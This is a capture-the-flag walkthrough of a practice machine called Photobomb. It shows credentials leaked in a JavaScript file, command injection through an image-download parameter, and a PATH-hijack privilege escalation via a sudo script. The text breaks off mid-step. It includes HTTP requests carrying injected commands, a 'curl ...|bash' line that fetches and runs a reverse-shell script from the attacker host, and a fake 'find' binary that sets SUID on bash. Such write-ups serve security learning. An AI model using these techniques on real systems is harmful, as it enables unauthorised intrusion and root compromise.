$ nmap -p- --min-rate 5000 10.129.228.60
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-06 10:14 EDT
Warning: 10.129.228.60 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.129.228.60
Host is up (0.0056s latency).
Not shown: 51828 closed tcp ports (conn-refused), 13705 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
We have to add photobomb.htb to our /etc/hosts file to view port 80
JS Credentials
The webpage looks like a corporate page:
When we click the link, it redirects us to some gallery.
Since the page mentions there are credentials, we can view the page source to find photobomb.js containing some credentials:
functioninit() {// Jameson: pre-populate creds for tech support as they keep forgetting them and emailing meif (document.cookie.match(/^(.*;)?\s*isPhotoBombTechSupport\s*=\s*[^;]+(.*)?$/)) {document.getElementsByClassName('creds')[0].setAttribute('href','http://pH0t0:b0Mb!@photobomb.htb/printer'); }}window.onload = init;
These credentials don't tell me anything new, so let's move on. At the bottom of the gallery, we can download images.
Here's the request generated when we download a photo:
POST /printer HTTP/1.1Host:photobomb.htbUser-Agent:Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language:en-US,en;q=0.5Accept-Encoding:gzip, deflateContent-Type:application/x-www-form-urlencodedContent-Length:78Origin:http://photobomb.htbAuthorization:Basic cEgwdDA6YjBNYiE=Connection:closeReferer:http://photobomb.htb/printerUpgrade-Insecure-Requests:1photo=voicu-apostol-MWER49YaD-M-unsplash.jpg&filetype=jpg&dimensions=3000x2000
I didn't know how this was handling photos, but the long processing time between requests indicates to me that these photos might be dynamically generated instead of having all the possible combinations of photos stored on the website. This means that the parameters could be passed into a command, and then the image is returned.
I tried some basic command injection, and found that the filetype parameter was vulnerable:
POST /printer HTTP/1.1Host:photobomb.htbUser-Agent:Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language:en-US,en;q=0.5Accept-Encoding:gzip, deflateContent-Type:application/x-www-form-urlencodedContent-Length:102Origin:http://photobomb.htbAuthorization:Basic cEgwdDA6YjBNYiE=Connection:closeReferer:http://photobomb.htb/printerUpgrade-Insecure-Requests:1photo=voicu-apostol-MWER49YaD-M-unsplash.jpg&filetype=jpg;curl+10.10.14.13/rcecfm&dimensions=3000x2000
With this, we can use curl 10.10.14.13/shell.sh|bash to get a reverse shell.
We can then grab the user flag from the home directory.
Privilege Escalation
Sudo Privileges
The user is able to run a script as root.
wizard@photobomb:/tmp$ sudo -l
Matching Defaults entries for wizard on photobomb:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User wizard may run the following commands on photobomb:
(root) SETENV: NOPASSWD: /opt/cleanup.sh
SETENV just means that the current environment is used instead and that we can specify the environment variables before running the command:
Here's the script:
wizard@photobomb:/tmp$cat/opt/cleanup.sh#!/bin/bash./opt/.bashrccd/home/wizard/photobomb# clean up log filesif [ -s log/photobomb.log ] &&! [ -L log/photobomb.log ]then/bin/catlog/photobomb.log>log/photobomb.log.old/usr/bin/truncate-s0log/photobomb.logfi# protect the priceless originalsfindsource_images-typef-name'*.jpg'-execchownroot:root{} \;
The find binary does NOT have an absolute path, which means we can create a binary called find that executes a reverse shell and change our PATH variable to execute it first.
First, create a file called find with a malicious command:
$catfind#!/bin/bashchmod+s/bin/bash
Afterwards, download this to the machine and make it executable. Then, just run this:
